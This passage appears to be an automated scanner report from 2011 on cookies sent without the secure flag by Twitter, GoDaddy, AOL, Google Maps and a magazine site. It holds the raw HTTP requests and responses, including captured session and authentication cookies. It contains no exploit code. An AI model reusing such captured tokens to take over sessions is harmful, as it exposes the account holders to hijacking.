Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; k=173.193.214.243.1304470443436909; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCRYvlAWfzUdGijPb%2B6ja82xN%2BH8W6aFgHQSpuNVLdmBU0LhnFMWTHe5IHHaiGlrUFWFz73h0a1oGmrHXt6T4cZhn%2B5tDCDw941cPbbLYne7DEIX6oFRVcro6%2FBLBhhmFWQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.7.10.1304617828

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:51:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599877-64646-36898
ETag: "06f262ea632c8d98b47e6b792a37a509"-gzip
Last-Modified: Thu, 05 May 2011 12:51:17 GMT
X-Runtime: 0.11675
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 67e0037d977aac500cebe3d2cd3c91e1c1ab51c2
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 45875

<!DOCTYPE html>
<html lang="">
<head>
<title>Twitter / Create an Account</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" ch
...[SNIP]...

10.2. https://www.fightmagazine.com/mma-magazine/subscribe.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.fightmagazine.com
Path:	/mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

10.3. https://www.godaddy.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
HPBackground=DanicaImageOne; path=/
HPBackground=DanicaImageOne; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.4. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.5. https://account.login.aol.com/_cqr/opr/opr.psp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://account.login.aol.com
Path:	/_cqr/opr/opr.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

OPR_SC=diAxLjAga2lkIDAgVHI2THpNVUtRVzlueFJYQVVaU01OSkNDWG5RPQ%3D%3D-NcFbxVvZ3cGQxGlfmjBVPVkJW64%2BeBxWJqQTawIkTLE5BKUhKD6jK%2BDOwZYGCPdVZtVKmX%2BwbWrRDwLObZcV8YEfzzgBFtHkpa%2Fro2ZZ0ZA%3D; Domain=account.login.aol.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=S&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617350589-Repeat%7C1367689350589%3B%20s_nrgvo%3DRepeat%7C1367689350591%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:35 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=" "; Domain=account.login.aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgVHI2THpNVUtRVzlueFJYQVVaU01OSkNDWG5RPQ%3D%3D-NcFbxVvZ3cGQxGlfmjBVPVkJW64%2BeBxWJqQTawIkTLE5BKUhKD6jK%2BDOwZYGCPdVZtVKmX%2BwbWrRDwLObZcV8YEfzzgBFtHkpa%2Fro2ZZ0ZA%3D; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 9977

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...

10.6. https://aolproductcentral.aol.com/ClickBroker previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://aolproductcentral.aol.com
Path:	/ClickBroker

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

OFBiz.Visitor=2833631; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ClickBroker HTTP/1.1
Host: aolproductcentral.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 10:52:20 GMT
Set-Cookie: JSESSIONID=9985EAD08E4D785B6C549D405DE9BA1A.storefrontus-m01a; Path=/; Secure
Set-Cookie: OFBiz.Visitor=2833631; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 21413
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Beg
...[SNIP]...

10.7. https://bill.aol.com/SPortal/jsp/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bill.aol.com
Path:	/SPortal/jsp/main.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

RSP_LOCAL_BILL.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=bill.aol.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SPortal/jsp/main.jsp HTTP/1.1
Host: bill.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 12:41:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2 mod_jk/1.2.28 mod_rsp20/rsp_plugins_v16_r2.09-06-29:mod_rsp2.2.so.rhe-5-x86.v16_r2.1
Set-Cookie: RSP_LOCAL_BILL.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=bill.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=bill.aol.com&authLev=S&lang=en&locale=us&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp
Content-Length: 388
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

10.8. https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bill.aol.com
Path:	/SPortal/jsp/notify_about_notify.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

RSP_LOCAL_BILL.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=bill.aol.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SPortal/jsp/notify_about_notify.jsp HTTP/1.1
Host: bill.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 12:42:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2 mod_jk/1.2.28 mod_rsp20/rsp_plugins_v16_r2.09-06-29:mod_rsp2.2.so.rhe-5-x86.v16_r2.1
Set-Cookie: RSP_LOCAL_BILL.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=bill.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=bill.aol.com&authLev=2&lang=en&locale=us&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fnotify_about_notify.jsp
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

10.9. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PREF=ID=916aad4fa2d46b54:TM=1304592793:LM=1304592793:S=ngvj94qxaaorD5lW; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=916aad4fa2d46b54:TM=1304592793:LM=1304592793:S=ngvj94qxaaorD5lW; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

10.10. https://my.screenname.aol.com/_cqr/login/checkStatus.psp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/checkStatus.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_cqr/login/checkStatus.psp HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

10.11. https://my.screenname.aol.com/_cqr/login/jslogin.psp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/jslogin.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SNS_LDC=1&-&-&1304557422&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_cqr/login/jslogin.psp HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:42 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557422&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/
Content-Type: application/x-javascript;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Connection: close

var _sns_sd_rev="$Revision: 1.56 $";
var snshosturl="",wscinstalled=0,i=0,_sns_var_="",lu="",la="",loginId="",nmvalpos=0,_sns_width_=174,_sns_height_=198,frameAlreadyInserted=false,snsdata="",
...[SNIP]...

10.12. https://my.screenname.aol.com/_cqr/login/login.psp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

SNS_SC=diAxLjAga2lkIDEgV1c0Nitaem4vb3ZIUFYzcGJTengxR3c1dlF3PQ%3D%3D-wxKeSTWr4DGDDkp%2Bthu0P5TkNGCsNglO5cHXCh0P1RL8MIMzkoTUBhBMZ2PpkNq2C2DvE9bN2WYXgim8PnrLlSYn2or1%2F5ga4UFQ3vsO5jfTwGowZx4%2FJc88sm2suX6Y; Domain=my.screenname.aol.com; Path=/
SNS_LDC=1&-&-&1304557220&1&1304557220&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:00:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_cqr/login/login.psp?offerId=aol-com-jv3-en-us&sitedomain=startpage.aol.com&siteState=http://www.aol.com&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
Referer: https://new.aol.com/productsweb/?promocode=825345&ncid=txtlnkuswebr00000106
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-xwt4pvwxgiNuEXsL62c8YI2ZXtszwMu%2F; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgV1c0Nitaem4vb3ZIUFYzcGJTengxR3c1dlF3PQ%3D%3D-wxKeSTWr4DGDDkp%2Bthu0P5TkNGCsNglO5cHXCh0P1RL8MIMzkoTUBhBMZ2PpkNq2C2DvE9bN2WYXgim8PnrLlSYn2or1%2F5ga4UFQ3vsO5jfTwGowZx4%2FJc88sm2suX6Y; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557220&1&1304557220&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:00:20 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14833
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14833

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...

10.13. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/_cqr/logout/mcLogout.psp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
SNS_LDC=1&-&-&1304557422&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/

